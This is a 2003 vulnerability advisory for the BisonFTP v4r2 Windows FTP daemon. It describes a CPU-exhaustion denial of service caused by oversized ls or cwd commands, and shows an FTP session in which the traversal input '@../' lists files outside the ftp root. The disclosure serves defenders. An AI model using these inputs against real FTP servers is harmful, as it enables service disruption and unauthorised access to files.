[immune advisory] Mulitple vulnerabilities found in BisonFTP

BisonFTP is a FTP daemon used on Microsoft Windows 9x/NT systems.

-[ DESCRIPTION ]----------------------------------------------------------------
I) BisonFTP is vulnerable to a DoS attack by sending ftp commands with big
data. By sending the ftp command ls or cwd with 4300 bytes or more,
BisonFTP will start 100% CPU usage until the socket is closed by the client.

II) It's possible to trick BisonFTP into revealing confidiential information
about files outside ftp root.

ftp> ls @../
227 Entering PASV Mode (10,10,10,10,4,126)
150 Directory List Follows
-rwxrwxrwx   1 user     group      739577 Feb 05  2002 BisonFTP42.exe
226 Listing complete.
ftp> mget @../Biso
local: BisonFTP42.exe remote: BisonFTP42.exe
227 Entering PASV Mode (10,10,10,10,4,128)
550 File does not exist
ftp>

% Note that BisonFTP42.exe is NOT located in ftp root.

-[ AFFECTED VERSIONS ]----------------------------------------------------------
BisonFTP v4r2.

• Earlier versions are not tested.

-[ SOLUTION/WORKAROUND ]--------------------------------------------------------
It's not possible to get in contact with the people at http://www.bisonftp.com
anymore. I guess a new version will never be released.

Workaround, since there might not be a new version you probaly better to
install another FTP daemon.

-[ CREDIT ]---------------------------------------------------------------------
Bugs found: 15/jan 2003, by Jimmi Andersen
Vendor contacted: 11/feb 2003
Made public: 17/feb 2003
http://www.immune.dk | Immune - Angreb og forsvar af systemer